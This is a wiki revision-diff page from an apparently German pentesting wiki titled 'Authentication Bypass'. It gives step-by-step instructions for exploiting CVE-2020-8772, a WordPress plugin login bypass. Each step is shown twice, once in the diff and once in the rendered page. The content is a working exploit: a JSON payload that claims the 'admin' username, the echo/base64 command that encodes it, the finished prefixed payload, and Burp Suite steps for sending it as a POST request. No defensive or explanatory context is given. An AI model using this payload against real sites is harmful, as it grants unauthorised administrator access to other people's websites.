Authentication Bypass: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 1: | Zeile 1: | ||
| + | *Reload the target website and intercept the request using Burp Suite. | ||
| + | *Create the JSON payload and convert it to base64. | ||
| + | |||
| + | Payload: {“iwp_action”:”add_site”,”params”:{“username”:”admin”}} | ||
| + | |||
| + | *echo ‘{“iwp_action”:”add_site”,”params”:{“username”:”admin”}}’ | base64 -w0 | ||
| + | |||
| + | *Append the base64 generated payload with the String mentioned in the exploit URL. | ||
| + | |||
| + | Payload: _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo= | ||
| + | |||
| + | *Right-click on Burp suite, and click on the “Change request method” to convert the request from GET to POST. | ||
| + | |||
| + | *Place the payload created as POST request arguments. | ||
| + | |||
| + | *Click on Forward and turn of the intercept. | ||
| + | |||
| + | |||
| + | |||
| + | |||
| + | |||
| + | |||
[https://blog.pentesteracademy.com/cve-2020-8772-exploitation-under-3-minutes-594265b4e26a Bypass] | [https://blog.pentesteracademy.com/cve-2020-8772-exploitation-under-3-minutes-594265b4e26a Bypass] | ||
Version vom 12. April 2022, 07:06 Uhr
- Reload the target website and intercept the request using Burp Suite.
- Create the JSON payload and convert it to base64.
Payload: {“iwp_action”:”add_site”,”params”:{“username”:”admin”}}
- echo ‘{“iwp_action”:”add_site”,”params”:{“username”:”admin”}}’ | base64 -w0
- Append the base64 generated payload with the String mentioned in the exploit URL.
Payload: _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=
- Right-click on Burp suite, and click on the “Change request method” to convert the request from GET to POST.
- Place the payload created as POST request arguments.
- Click on Forward and turn of the intercept.